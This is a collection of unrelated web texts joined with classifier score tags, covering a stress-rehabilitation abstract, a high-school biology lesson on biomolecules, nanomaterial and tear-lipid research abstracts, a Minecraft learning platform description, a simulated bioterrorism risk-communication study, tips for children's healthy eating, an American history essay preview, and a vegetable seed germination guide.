The physiological mechanisms of an integrated rehabilitation program and its constituent rehabilitation techniques, namely, local rhythmic thermal impulses; rapid autogenic regulation (RAR); and a session of slow, deep breathing, were studied in apparently healthy subjects who had experienced emotional stress. Mental arithmetic under the conditions of a time deficit with a reprimand was used as a model of emotional stress, which caused a number of rearrangements in the cerebral activity of the subjects, including enhanced β activity in the right frontal area and depression of slow EEG waves in the posterior cerebral areas, and promoted sympathetic influences and hemodynamic impairment. The set of rehabilitation measures, which was designed to affect the body as a whole, promoted the restoration of the initial cortical bioelectrical activity and autonomic status of the subjects. The mechanisms of each rehabilitation technique included in the program were determined.
|
__label__pos
| 0.710261
|
Biology 12 – Lesson 3 - Biological Molecules Chemistry Comes Alive – The Organic Molecules of Life Text Ref: Pg 32-45 and 52-61 The organic molecules of life are divided into four classes: POLYMERS
MONOMERS 1. Carbohydrates building blocks are: 2. Lipids building blocks are: 3. Nucleic Acids building blocks are: 4. Proteins building blocks are: Hydrolysis adding water to break down the organic molecules (POLYMERS) into their building blocks (MONOMERS) e.g. Carbohydrates into glucose molecules Dehydration Synthesis removing a water molecule water to join building blocks (MONOMERS) to form organic molecules (POLYMERS) e.g. glucose molecules into carbohydrates http://nhscience.lonestar.edu/biol/dehydrat/dehydrat.html Carbohydrates Are a group of molecules that includes sugars and starches All carbohydrates contain carbon (C), hydrogen (H) and oxygen (O) All carbohydrate molecules are made up of one or more monomers called monosaccharides. Carbohydrates have a variety of important functions in living organisms: 1) Energy storage, Fuels Foods rich in carbohydrates include: breads, pasta, rice, corn, oats, fruit and veggies. 2) Structural Components of nucleotides, animal connective tissue, plant and bacterial cell walls, arthropod exoskeletons 3) Cell to cell communication and cell identification Carbohydrates are located on the outer surface of the cell membrane for the above purpose Monosaccharides “Simple Sugars” Single-chain or single-ring structures containing 3-7 carbon atoms E.g. Glucose (C6H12O6), a hexose sugar, is blood sugar. 1 Biology 12 – Lesson 3 - Biological Molecules E.g. Ribose (C5H10O5), a pentose sugar, is found in ribonucleic acid (RNA). Empirical formula for a monosaccharide: E.g. Glucose, aka blood sugar, is a 6 carbon sugar (n=6) The chemical formula of glucose is: C6H12O6 E.g. Ribose is a 5 carbon sugar (n=5) found in RNA molecules. The chemical formula of ribose is: C5H10O5 Disaccharides “Double Sugars” A disaccharide is formed when 2 monosaccharides are joined by dehydration synthesis. During dehydration synthesis a bond between 2 monosaccharides is created when one monosaccharide loses a hydroxyl group (-OH) and another loses a hydrogen (-H) forming a water (dehydration) Disaccharides must be digested into monosaccharides before they can be absorbed from the digestive tract and into the blood A hydrolysis reaction is used to break a disaccharide apart into 2 monosaccharides. 2 Biology 12 – Lesson 3 - Biological Molecules Polysaccharides “Many Sugars” Polysaccharides are long carbohydrate chains made up of individual monosaccharides that have been linked together by dehydration synthesis They are fairly insoluble, making them great storage molecules Starch Storage form of glucose inside plant cells When we eat starchy foods such as potatoes or grains the starch must be digested so its glucose monomers can be absorbed and used to make energy Composed of many glucose monomers in straight chains, with only a few branched chains 3 Biology 12 – Lesson 3 - Biological Molecules Glycogen Storage form of glucose in animals and humans Stored in muscle and liver cells Is a highly branched large molecule When blood sugar levels drop, liver cells break down glycogen and release its glucose monomers into the blood Question to Ponder…. How does the highly branched structure of glycogen make it both an effective storage molecule and allow us to an almost instant access to glucose fuel? What is the key difference between starch and glycogen??? Cellulose Found in plant cell walls – gives them rigidity. We are unable to digest it, BUT it acts as an important source of fiber that helps move feces through the colon Is a linear molecule with an alternating ester bond that humans cannot break 4 Biology 12 – Lesson 3 - Biological Molecules Lipids Lipids are insoluble (do not dissolve) in polar solvents like water Like carbohydrates, all lipids contain carbon (C), oxygen (O) and hydrogen (H). The most familiar are found in fats (animal source) and oils (plant source) Main Functions: 1. Used for long-term energy storage – they give the most energy per unit gram of food 2. Insulate against heat loss 3. Form a protective cushion around major organs E.g. Kidneys 4. Storage of fat soluble vitamins – E, K, A & D 3 Main Types: 1. Neutral Fats (Triglycerides) 2. Phospholipids 3. Steroids Neutral Fats (Triglycerides) The neutral fats are commonly known as fats when solid or oils when liquid Deposits of neutral fats are found mainly beneath the skin, where they insulate the deeper body tissues from heat loss and protect them from mechanical trauma As neutral fats are digested into their monomers, they release large amounts of energy our body can use 5 Biology 12 – Lesson 3 - Biological Molecules They are produced when 1 glycerol and 3 fatty acid chains are joined by dehydration synthesis Because of the 3:1 fatty acid to glycerol ratio, the neutral fats are also called triglycerides. Saturated Fatty Acids Fatty acid chains with single covalent bonds between carbon atoms Solid at room temperature. Usually from animal sources i.e. Butter, lard Unsaturated Fatty Acids Fatty acid chains with one (monounsaturated) or more (polyunsaturated) double bonds between carbons. Liquid or soft at room temperature i.e. oils Usually from plant sources Hydrogenation (adding hydrogens = trans fat) can convert them to margarine and Crisco. CBC Radio Interview on Fatty Acids http://www.cbc.ca/metromorning/episodes/2012/09/12/confusing-omega-3/ 6 Biology 12 – Lesson 3 - Biological Molecules Phospholipids Phospholipids are the chief component of cell membranes Phospholipids are modified triglycerides Phospholipids contain a phosphate group and 2 fatty acid chains The “head” region is hydrophilic (attracts water or other charged ions). The “tail” region is hydrophobic (“phobic” repels water). These properties result in a 2 layered membrane often called a “phospholipid bilayer”. The membrane which surrounds ALL of our cells is a phospholipid bilayer and maintains a barrier between extracellular (“extra” outside) and intracellular (“intra” inside) fluids. 7 Biology 12 – Lesson 3 - Biological Molecules Steroids Structurally steroids are very different from fats Basic structure is 4 interlocking hydrocarbon rings The single most important molecule in our steroid chemistry is cholesterol We ingest cholesterol in animal products such as eggs, meat, and cheese, and our liver produces a certain amount Main Functions of Cholesterol: 1. Cholesterol is a key component to plasma membranes in animal cells - plays a role in membrane fluidity (more on that when we learn about cells). 2. Cholesterol is the precursor to the sex hormones estrogen and testosterone 3. Raw material for the synthesis of vitamin D and bile salts. Did You Know? Cholesterol has earned a bad reputation because of its role in arteriosclerosis – clogging and hardening of the arteries. Although excessive amounts of cholesterol in the diet can lead to this dangerous condition, it is absolutely essential for human life. For example, without sex hormones such as estrogen and testosterone, reproduction would be impossible, and a total lack of corticosteroids produced by the adrenal gland is fatal. 8 Biology 12 – Lesson 3 - Biological Molecules Proteins Functions of Proteins Enzymes - biological catalysts that speed up chemical reactions in our bodies e.g. synthesis and hydrolysis, DNA replication, digestion, and blood clotting Structural proteins - are found throughout the body e.g. keratin builds hair and nails, collagen gives strength to skin, cartilage, ligaments, tendons, muscle fibers (skeletal, smooth, and cardiac) are composed of actin and myosin proteins Membrane proteins - The plasma membrane of cells has numerous embedded proteins that act as channels or pores, carriers, and pumps to move molecules into and out of the cell Chemical messengers - peptide hormones control functions such as metabolic rate, growth, stress response, blood glucose levels, immune function, and circadian rhythms Plasma proteins - plasma is the liquid portion of blood making up 55% of the volume, Plasma is mainly water and contains 7-8% proteins. Albumin helps maintain blood volume and pressure Globulins help fight infection Fibrinogen forms blood clots Structure of Proteins Amino Acids Proteins are linear polymers made from monomers called amino acids There are 20 common amino acid The 12 amino acids our body can produce are called non-essential amino acids The 8 amino acids we must obtain from our food are called essential amino acids Chemical Structure of an Amino Acid All amino acids have the same structural components. A central carbon atom is linked to 4 different chemical groups: 1) Hydrogen atom 2) Amine group –NH2 3) Carboxylic acid group –COOH 4) R-group (remainder group) 9 Biology 12 – Lesson 3 - Biological Molecules Differences in the “R” group make each amino acid chemically unique We can think of the 20 amino acids as a 20-letter “alphabet” used in specific combinations to form proteins. In our bodies there are thousands of proteins and everyone has a specific and exact combination of amino acids Peptide Bonds Proteins are polymers, i.e. long linear chains (no branches) of amino acids joined together by dehydration synthesis The bond which is formed between 2 amino acids is called a peptide bond 10 Biology 12 – Lesson 3 - Biological Molecules Dipeptide – when 2 amino acids are linked by peptide bonds Polypeptide – when several or many amino acids are linked by peptide bonds Most proteins contain 100 – 10 000 amino acids For example: Oxytocin is a protein hormone that stimulates a woman’s uterus to contract during labour. It is a small polypeptide chain made up of 9 amino acids linked together by peptide bonds. Oxytocin: Cys – Tyr – Ile – Gln – Asn – Cys – Pro – Leu – Gly - NH2 Levels of Protein Organization Proteins have 4 different structures or levels of organization. Primary Structure (1°) Linear sequence of amino acids that form a polypeptide chain Resembles a strand of beads on a chain. Proteins are not functional in this form Secondary Structure (2°) Hydrogen bonds form between the NH and CO groups in amino acids in the primary polypeptide chain These hydrogen bonds cause the chain to form an alpha helix or a beta pleated sheet A single polypeptide chain may have BOTH types of secondary structure at various places along its length. 11 Biology 12 – Lesson 3 - Biological Molecules Tertiary Structure (3°) Tertiary structure is achieved when an alpha helix or pleated sheet, folds up to produce a compact ball-like or globular molecule This structure is maintained by both hydrogen and covalent bonds between amino acids. Quaternary Structure (4°) When 2 or more polypeptide chains join together to form a single complex protein The oxygen-binding protein haemoglobin has this structure Most enzymes have this structure The activity of a protein depends on its specific 3-dimensional structure Denaturing Proteins The ability of a protein to function correctly directly depends on its 3-dimensional shape When the pH drops below a critical level or our body temperature rises above normal, this can cause hydrogen bonds to break - proteins will unfold and lose their 3-D shape When a tertiary or quaternary protein loses its 3-D shape it becomes non-functional and is said to be denatured e.g When you add acid to milk (lower the pH) the milk curdles because casein proteins found in milk have lost their quaternary structure If you cook an egg you are adding excessive heat to the albumin proteins found in egg whites High body temperatures (fever) have the potential to cause many different enzymes within the body to denature 12 Biology 12 – Lesson 3 - Biological Molecules Nucleic Acids The nucleic acids are the largest biological molecules in the body. They are often referred to as the “molecules of life” because they carry all of life’s instructions encrypted in chemical code. This code governs how the body grows, develops, functions, and maintains homeostasis – a state of internal balance. There are 2 major classes of nucleic acids in our bodies: 1) Deoxyribonucleic Acid (DNA) 2) Ribonucleic Acid (RNA) Both DNA and RNA molecules are polymers constructed from monomers called nucleotides Every nucleotide is made from 3 subunits: 1. Phosphate (phosphoric acid) 2. Pentose sugar (5-carbon sugar) Deoxyribose in DNA Ribose in RNA 3. Nitrogen-containing base (base because their presence raises the pH of a solution) Nitrogenous bases in DNA: cytosine (C), guanine (G), adenine (A), thymine (T) Nitrogenous bases in RNA: cytosine (C), guanine (G), adenine (A), uracil (U) Examine the chemical structure of a nucleotide below: 13 Biology 12 – Lesson 3 - Biological Molecules Deoxyribonucleic Acid (DNA) Chemically, DNA looks a lot like a “twisted ladder” – two long polymers made up of adjoining nucleotides that twist to form a double helix. The 2 sides of the ladder are referred to as the “sugar-phosphate backbones” The “rungs” of the ladder are formed when 2 complementary nitrogenous bases are joined by weak hydrogen bonds Adenine (A) always hydrogen bonds to ____________ (complementary bases) Cytosine (C) always hydrogen bonds to ____________ (complementary bases) The sugar of one nucleotide and the phosphate of another are held together by strong phosphodiester bonds 14 Biology 12 – Lesson 3 - Biological Molecules A Closer Look at DNA DNA’s 4 nitrogenous bases (C, G, A, T) can be separated into 2 categories: 1) Purines Have a 2-ring structure E.g. Guanine (G) and Adenine (A) 2) Pyrimidines Have a single-ring structure Ex. Cytosine (C) and Thymine (T) One purine always hydrogen bonds to a pyrimidine. The complementary base pair A – T forms _____hydrogen bonds The complementary base pair C – G forms _____ hydrogen bonds Did You Know? Our entire DNA sequence would fill 200 1,000 page New York telephone directories. If unwound and tied together, the strands of DNA in one cell, would stretch almost six feet long but would only be 50 trillionths of an inch wide. If you uncoil the DNA in all of your cells, you could reach the moon 6000 times! There are 3 billion letters in the human genome and it would take a person who could type 60 words per minute, 8 hours a day, around 50 years to type out the human genome. In 2003, the human genome was completely sequenced, down to the last nucleotide. DNA has a multi-coiled structure that allows an incredible amount of it to be packed into the tiny space within a cell’s nucleus When cells are not dividing, DNA is called chromatin – a loosely coiled tangled mess of DNA inside the nucleus When human cells are preparing to divide, their DNA is tightly coiled into 46 X shaped chromosomes that are arranged in 23 pairs. 15 Biology 12 – Lesson 3 - Biological Molecules Each chromosome contains sections of DNA called genes Each gene contains a set of instructions to make a specific protein 16 Biology 12 – Lesson 3 - Biological Molecules Ribonucleic Acid (RNA) DNA is simply a storage molecule for genetic information – although DNA contains the instructions for how to build proteins, it is NOT capable of building proteins itself RNA is a “molecular slave” - it uses instructions provided by the genes in DNA to build proteins RNA is made within a cell’s nucleus; however it functions mainly outside of the nucleus RNA is a single-stranded polymer of many nucleotides. The pentose sugar in the sugar-phosphate backbone (S-P-S-P-S…etc.) of RNA is ribose The 4 nitrogenous bases found in an RNA molecule are: Cytosine (C), Guanine (G), Adenine (A), Uracil (U). There are 3 major types of RNA – all play a unique role in protein synthesis. 1) Messenger RNA (mRNA) 2) Ribosomal RNA (rRNA) 3) Transfer RNA (tRNA) 17 Biology 12 – Lesson 3 - Biological Molecules Comparing DNA and RNA 18 Biology 12 – Lesson 3 - Biological Molecules ATP – Adenosine Triphosphate As we have learned glucose is the most important fuel for our bodies and our cells, however NONE of the chemical energy stored in its bonds is used directly to power cellular work As glucose is broken down in the mitochondria the energy that is produced is captured and stored as small packets of energy in the bonds of ATP ATP, in turn, acts as a chemical “drive shaft” that provides a useable form of energy immediately available to cells Structurally ATP has a similar structure to a RNA nucleotide in that it contains adenine, ribose and a phosphate group however, it has a total of 3 phosphate groups instead of one. The unstable bonds that hold the phosphate molecules together contain large amounts of stored energy When cells require energy, ATP undergoes hydrolysis, and a bond between phosphate molecules is broken to release energy E.g. ATP is used by virtually all cells in the body to synthesize macromolecules such as carbohydrates and proteins. Muscle cells use the energy from the breakdown of ATP to contract Nerve cells use the energy from the breakdown of ATP to conduct nerve impulses Cells use ATP to actively pump various molecules against their concentration gradients either in or out of the cell 19
|
__label__pos
| 0.997041
|
Supercritical fluids have shown an increasing interest as reactive media (tunable properties from liquid to gas) to synthesize nanostructured materials by thermal decomposition of inorganic precursors at relatively low pressure and temperature. The particle formation process (nucleation and growth) is made by high supersaturation in the supercritical fluid. So, the adjustment of synthesis process parameters results in a precise control of particle shape, size (between 10 nm and 10 μm), and chemical composition. We present the technique of thermal, chemical-heat, and structural strength treatment of materials to produce nanostructured nickel oxinitride in supercritical ammonia (solvent and reactant) from the thermal decomposition of nickel hexafluroroacetylacetonate (280°C, 18 MPa). A preliminary study concerning magnetic properties of the material was done and a correlation between particle size and magnetic behavior was pointed out.
|
__label__pos
| 0.999464
|
MCdemy is an online platform that brings to the world of Minecraft the exercises and duties that students usually perform with pencil and paper, interspersing purely playful tests to make the experience even more fun, with which we definitively break the motivational barrier. In addition, MCdemy does not require prior planning or preparation of the classroom environment, downloading this task to the faculty, and is accessible from any computer with an official Minecraft license and an internet connection.
GBL: Game Based Learning
Gamification and videogame-based learning are rising trends called to revolutionize the future of education. We only have to see the important role that video games occupy in children's leisure today to realize the motivating potential they have if we manage to integrate them into academic environments as tools that allow us to achieve meaningful learning. We have the mistaken belief that children love video games because they are easy and they hate homework because they are difficult, when what usually happens is just the opposite. Most video games are very difficult and require a mastery of information and very complex techniques, which pose a great intellectual challenge for the player, who find in the game a stimulus to acquire knowledge and develop new skills.
Why Minecraft?
Today there are many digital educational products in almost all existing technology platforms. However, many of these applications are too oriented to the achievement of the curricular objectives or facilitate the work of the teacher, even some forget the most important factor: the inherent fun of the game. We, when we set out to develop a learning environment based on videogames, went directly to the source: we asked the children what is your favorite video game? And the response that they moved us was practically unanimous: Minecraft.
For children, Minecraft offers a virtual world in which they have absolute freedom of movement, and where everything is composed of blocks of different materials that can combine to make new tools or construction elements, in a kind of infinite "virtual lego".
For us, a team made up of developers, teachers and pedagogues, Minecraft offers us a Virtual Learning Environment where we can model innumerable types of educational activities of different subjects. This is how MCdemy emerges.
|
__label__pos
| 0.753321
|
Abstract
Purpose. To quantify the molecular lipid composition of patient-matched tear and meibum samples and compare tear and meibum lipid molecular profiles.
Methods. Lipids were extracted from tears and meibum by bi-phasic methods using 10:3 tert-butyl methyl ether:methanol, washed with aqueous ammonium acetate, and analyzed by chip-based nanoelectrospray ionization tandem mass spectrometry. Targeted precursor ion and neutral loss scans identified individual molecular lipids and quantification was obtained by comparison to internal standards in each lipid class.
Results. Two hundred and thirty-six lipid species were identified and quantified from nine lipid classes comprised of cholesterol esters, wax esters, (O-acyl)-ω-hydroxy fatty acids, triacylglycerols, phosphatidylcholine, lysophosphatidylcholine, phosphatidylethanolamine, sphingomyelin, and phosphatidylserine. With the exception of phospholipids, lipid molecular profiles were strikingly similar between tears and meibum.
Conclusions. Comparisons between tears and meibum indicate that meibum is likely to supply the majority of lipids in the tear film lipid layer. However, the observed higher mole ratio of phospholipid in tears shows that analysis of meibum alone does not provide a complete understanding of the tear film lipid composition.
|
__label__pos
| 0.95821
|
Community Reaction to Bioterrorism: Prospective Study of Simulated Outbreak
Published Date:Jun 2003
Publisher's site:
Source:Emerg Infect Dis. 9(6):708-712.
Details:
Personal Authors:
Keywords:Adolescent Adult Aged Behavior Bioterrorism Centers For Disease Control And Prevention (U.S.) Communication Community Health Services Cooperative Behavior Disaster Planning Disease Outbreaks Female Humans Interinstitutional Relations Male Mass Behavior Middle Aged Prospective Studies Psychological Questionnaires Research Rift Valley Fever Risk Communication Terrorism United States Bioterrorism Research
Description:To assess community needs for public information during a bioterrorism-related crisis, we simulated an intentional Rift Valley fever outbreak in a community in the southern part of the United States. We videotaped a series of simulated print and television "news reports" over a fictional 9-day crisis period and invited various groups (e.g., first-responders and their spouses or partners, journalists) within the selected community to view the videotape and respond to questions about their reactions. All responses were given anonymously. First-responders and their spouses or partners varied in their reactions about how the crisis affected family harmony and job performance. Local journalists exhibited considerable personal fear and confusion. All groups demanded, and put more trust in, information from local sources. These findings may have implications for risk communication during bioterrorism-related outbreaks.
Document Type:
Collection(s):
Main Document Checksum:urn:sha256:c7b59b63cdfdd143b8e52a4099fe7da6a6f5b22c9023fd028074a6a174b28dbc
No Related Documents.
You May Also Like:
|
__label__pos
| 0.796052
|
Sometimes, children need a little bit of extra encouragement to eat their fruits and vegetables, and if you’re cooking for some particularly fussy eaters, your job can be just a little bit more challenging. Here, you’ll find the top seven ways to encourage your children — and the rest of your family — to eat better.
Jane Rylands from kitchen appliance retailer Belling shares her top tips for encouraging your children to eat healthier
In a recent survey, we carried out, 21% of people said that they were unsure how to amend recipes to cater to different tastes and diets. But, one of the simplest ways you can encourage your children to eat healthier and to prepare healthy kid-friendly dinners is to swap some of their favourite ingredients for more nutritious alternatives.
For example, consider using sweet potatoes instead of regular ones to make mash, chips and baked potatoes. Cauliflower also makes a great alternative to potatoes in curries and stews and can be a great substitute for rice. Use a spiraliser to make healthy vegetable versions of noodles and pasta using courgettes and carrots. You can gradually ease the kids into eating these healthier alternatives by mixing them in with your usual noodles.
For dessert, you can swap cream and ice cream for yoghurt — just mix it with berries for a vitamin-packed alternative to a classic ice cream sundae. You can even make your own ice lollies using fresh fruit juice and smoothies.
Children need to eat every 3-4 hours, so you’ll need snacks. For healthy snacks for kids, try swapping sweets and chocolate bars with small packs of raisins or a banana. Chopped up melon is also a great alternative that children will love.
Another simple way you can get healthier foods into your child’s diet is by ‘hiding’ it in other meals. This can be as simple as grating vegetables finely and adding them into pasta sauces or soups, adding fruit purees to their morning porridge, or even mixing them into your usual cake mix — this method is particularly effective in order to make healthy meals for picky kids.
One of my best tips to encourage your children to eat better is by making the food more appealing to them. Try cutting fruit into fun shapes, or making pictures using vegetables.
To encourage fussy eaters to try new things, consider having them rate their vegetables during each meal. This way, you can keep track of what they do like so you can make more of it. You could even try dedicating your weekly meals to a different fruit or vegetable, working together to come up with creative recipes that incorporate that week’s ingredient. You can then vote on your favourite meals at the end of the month so you can make them again in the future.
When doing your weekly food shop, bring your kids and ask them to select which fruits and vegetables they want this week. This will let you know which foods they do like, and they’ll be more likely to eat them if they know that they’ve chosen it themselves. This is also a great way to slowly introduce new foods to them
To get kids excited about eating healthy foods, you could try growing your own fruits and vegetables at home. This is both more environmentally friendly and can help to cut the cost of your weekly shop. Plus, your little ones will be more likely to eat the food they’ve worked hard to grow with you.
If you don’t have a garden or growing your own produce would be difficult, why not take the kids fruit picking? It’ll give you the opportunity to talk about where their food comes from, and they’ll enjoy eating them after they’ve had a fun day out gathering them all.
Try asking children to lend a helping hand when you’re preparing vegetables for dinner. If they’re too young to hold a knife, ask them to pass you certain vegetables as you’re chopping. Just like growing your own food, knowing you’ve both worked hard to prepare the meal together will encourage your children to eat better. Just holding the food in their hands for a while can increase their familiarity with different types of fruits and vegetables, and they may be less reluctant to try them.
Allowing children to assemble their own plates or “build it yourself” meals such as fajitas and sandwiches can also work really well! Simply set out a selection of healthy options and let your kids do the rest.
To encourage your children to make these kinds of decisions on their own, reward healthy behaviours with praise. This could be as simple as verbal praise, or you could make a healthy eating rewards chart. For particularly fussy eaters, reward them with a point every time they eat a full serving of vegetables. When they reach a certain number of points, celebrate with a fun family day out to keep the behaviour going.
By following these seven simple tips, you can easily encourage your whole family to make healthier food choices.
|
__label__pos
| 0.563355
|
Essay Preview
For a nation that has been around for over 200 years, the history of America is full of memorable and significant events that have had an impact on today’s society. Presidential elections have changed significantly over the years, but candidates affiliated with political parties have been around since the late 17th century. Because of the Louisiana Purchase, the United States was able to quickly magnify in size. The American Revolution was the war that declared the United States the sovereign nation that it currently is. Important events like the election of 1796, the Louisiana Purchase, and the American Revolution have changed the United States unlike any other events before.
The election of 1796 was the first presidential election in the United States that saw a candidate affiliated with a political party elected and the third United States election overall. What makes this election so significant is that hundreds of years later, elements that were used back then are still used today. During the first election in the United States, there were no political parties. Voters were split between Federalists, people who supported the ratification of the Constitution, and Anti-Federalists, people who did not support the ratification of the Constitution. George Washington would win the presidency with all of the popular votes and a majority of the electoral votes. His vice president would be John Adams, a Federalist. During this time, voters could only vote for the president and whoever won the second-most electoral votes would become vice president. During the next election, George Washington and John Adams would remain president and vice president, respectively. Washington’s retirement from the presidency led to opp...
... middle of paper ...
... deciding factor for the colonists was an alliance with France. It is impossible to imagine all the different possibilities of what the United States would be like today if the American Revolution was lost or never fought at all. One thing that is certain is that the United States would not be the same.
The effects of events that took place over hundreds of years ago in America can still be seen today. American elections continue to involve the fundamentals of the election of 1796. The belief of a nation that expanded “from sea to shining sea” was obtainable because of acquisitions like tie Louisiana Purchase. Because of the Revolutionary War, the United States has become independent and grown into a global force unlike every before. The United States has flourished because of events such as the election of 1796, the Louisiana Purchase and the American Revolution.
Need Writing Help?
Get feedback on grammar, clarity, concision and logic instantly.Check your paper »
- "What is not illusionary is the reality of a new culture of opposition. It grows out of the disintegration of the old forms, vinyl and aerosol institutions that carry all the inane and destructive values of privatism; competition, commercialism, profitability and elitism It's not a "youth thing" by now but a generational event; chronological age is the only current phase". The previous quote was written by Andrew Kopkind in Rolling Stone on the Woodstock festival observing that a new culture was immersing from the roots of the adult American life (1960's 198).... [tags: American Culture]
Strong Essays 1918 words (5.5 pages)
- Slavery and Segregation are two components that have made a major impact on today’s society. Slavery is morally wrong, but many people still practiced it. Almost half of the nation believed it was wrong, but they were unwilling to do anything about it. The other half of the nation depended on slavery for producing goods, and this created a stalemate in the country. Freedom of slaves created segregation everywhere, and many black children could not attend school to be educated. Black children were not allowed to go to school with white children, leaving many black kids unable to read, write, and learn other subjects.... [tags: Uncle Tom´s Cabin, African American history]
Strong Essays 1383 words (4 pages)
- Religion has had a huge impact on American society. In fact majority of the current events occurring today are in some way related to religion. The impact that religion has had on the society we live in is understated. Everyone from atheists to religious people has been affected in one way or another by religion. There may not be any more religious groups as powerful as the Catholic Church was in old times, but religion still has a great influence on society and the world we live in. In order to understand the impact religion has had on American society, we must first learn what exactly “religion’ means.... [tags: Religion, Islam, Faith, Philosophy of religion]
Strong Essays 1138 words (3.3 pages)
- Technology is continuously developing and has begun creating shortcuts for the American society. As a society we need to find a balance between our technological use and our everyday life. In my opinion, society has become too dependent on technology. The more advanced technology becomes, the more it seems to be gaining control over our lives. Even though technology is offering society many beneficial qualities; it also is causing many negative effects to occur. Technology is affecting society socially, mentally, and physically.... [tags: american society, technological advancements]
Strong Essays 942 words (2.7 pages)
- Audience: My audience for this essay will be college age athletes impacted by Title IX. All is Fair in Love & Sports In January of 2011, Delaware University announced that it was discontinuing its men’s wrestling, swimming, tennis, and gymnastics programs (Gottesdiener, 2011). Organizations like this are being diminished and discarded at an ever-increasing rate all across America. College and high school students competing in these athletic events are truly passionate about their chosen sport. In many cases, promising athletes are offered scholarships, initiating a symbiotic relationship between the student and the school they play for.... [tags: negative impact on male athletics]
Strong Essays 1803 words (5.2 pages)
- In Democracy in America, Alexis De Tocqueville argues that the women and families in Aristocratic and Democratic societies have substantial distinctive characteristics in terms of livelihood. According to Tocqueville, the state of government affiliated with Americans also defined its people. He issued a negative view of Americans, created by their party affiliation. After examining the influence of a democratic society on the American people, he concluded that “ equality of conditions modifies the relations of citizens among themselves” (558).... [tags: Democracy, Sociology, Civil society]
Strong Essays 1097 words (3.1 pages)
- The novel The Adventures of Huckleberry Finn is an extremely important work of literature that addresses many world problems such as: poverty, race relations, and our role in society. Although some of these issues are not as prevalent today as they were in the 1880s, the novel still sends an important satirical message to anyone who is willing hear this story. This essay will analyze Huckleberry Finn and its relation to society today; the main issues that are addressed include: Huckleberry’s growth as a moral and upstanding person, race relations between African-Americans and Caucasian-Americans including Huck’s relation to Jim and the issue of slavery, the role of society and an analysis of... [tags: Society, Injustice, Slavery]
Strong Essays 725 words (2.1 pages)
- The automobile has made a dramatic impact on many different aspects of American society. The automobile industry has aided in the creation of malls and other large shopping areas, theme parks, hotels and motels, highways, and assorted drive through businesses such as banking and fast food. The vast popularization of cars and other automobiles has also impacted society negatively. Car accidents and other auto related death has increased as well as noise pollution, and the formation of a larger carbon footprint.... [tags: Automobile, Transport, Walking]
Strong Essays 1435 words (4.1 pages)
- Impact of Gangs in American Society An estimate of thirty-three thousand violent street gangs and prison gangs operate criminally in the United States today. Throughout the years, these crews have been increasing in violence and caused many deaths. Gangs have influenced the streets with violence, drugs, and much more crime, such as in robbery, fraud, extortion, and trafficking. Each year gang affiliation increases in American society. If gang participation decreases, then the amount of gang-related violence and deaths would reduce within a matter of time.... [tags: violence, crime, consequences]
Strong Essays 631 words (1.8 pages)
- American society and culture experienced an awakening during the 1960s as a result of the diverse civil rights, economic, and political issues it was faced with. At the center of this revolution was the American hippie, the most peculiar and highly influential figure of the time period. Hippies were vital to the American counterculture, fueling a movement to expand awareness and stretch accepted values. The hippies’ solutions to the problems of institutionalized American society were to either participate in mass protests with their alternative lifestyles and radical beliefs or drop out of society completely.... [tags: Hippies, Sociology, 1960's Counterculture]
Free Essays 2364 words (6.8 pages)
|
__label__pos
| 0.521613
|
Seed germination of vegetable and sowing times
Seed germination is the process by which an organism grows from a seed. The seeds inside the fruits or vegetables are designed to spread throughout the environment and grow into new plants in a process called
seed germination. Vegetable seed germination is mean by which a different plant species grow from a single seed into a plant. A general example of seed germination is the sprouting of a seedling from a seed of an angiosperm or gymnosperm. Sowing is the procedure of planting.
Let us discuss the
seed germination process and sowing in different vegetables; Bean Bean A bean seed begins to germinate when the soil gets to the right temperature and moisture penetrates the seed coat. Bean seeds germinate, or sprout, when water dissolves or cracks open the hard casing around the seed or embryo. Beans are sown from early October to mid-March depending on the climate. The seed is sown from 20 to 40 mm deep, depending on the prevailing weather. Generally, the beans are sown in rows around 500 mm apart and between 50-100 mm between plants. Bean vegetable seed germinationtemperature will be 70°F to 80°F and this germination is slow and poor when soil temperatures are below 60 F. Germination process may take two weeks or more if soil temperatures are below 60° If been seed is small (3000 per kg) and sown at a spacing 50 x 750 mm, 90 kg of seed is needed per hectare. For larger bean seed (1500 per kg), 180 kg of seed is needed per hectare if germination is 100%. Broccoli Broccoli Germinating broccoli seeds takes about 5 to 10 days depending on how warm the soil is. Warm soil will speed up the broccoli germination process, while cold soil will slow it down. Broccoli seeds germinate best in temperatures between 45°F and 85°F, and they can be sprouted in a house, in a greenhouse or in an outdoor garden’s soil. Sow seed ¼ to ½ (6 to 8 mm) inch deep in the seed-starting mix. The optimum time for seed sowing is mid-August to mid-September. Method of sowingin broccoli can be done by line sowing and broadcasting method. Cabbage Cabbage Cabbage vegetable seed germination takes best when exposed to a constant temperature of 65°F to 70° At this temperature range, cabbage seeds will sprout within three to four days. The cabbage seed germinationtemperatures range of 45 to 85 degrees Fahrenheit. Outside of the optimum temperature range, seeds can take anywhere from four to 14 days to germinate. Cooler temperatures slow the germination procedure, while warmer temperatures speed it up. The sowing of seeddirectly in the garden should wait for spring when the soil temperature warms to at least 40°F and the soil is tillable. Cabbage seeds need a planting depth of 1/2 to ¾ inch and spacing of inches, with seedlings, later thinned to 12 to 24 inches apart, in rows that are spaced at least 18 to 34 inches apart. Spinach Spinach Seed germination in spinachwill take 7 to 14 days but sometimes seed can take up to 3 weeks to germinate in cold soil. Spinach seeds germinate best in temperatures between 40°F and 75° For proper seed germination, the soil should not be warmer than 70ºF (21°C). Sow spinach seed one-half inch deep and two inches apart in beds or rows. Spinach produces beautifully in cool fall conditions, but it’s tricky to persuade the seed to germinate in the hot conditions of the late summer season. Sow spinach seeds ½-inch to 1-inch deep, covering lightly with soil. Sow 12 seeds per foot of row, or sprinkle over a wide row or bed.
You may also like
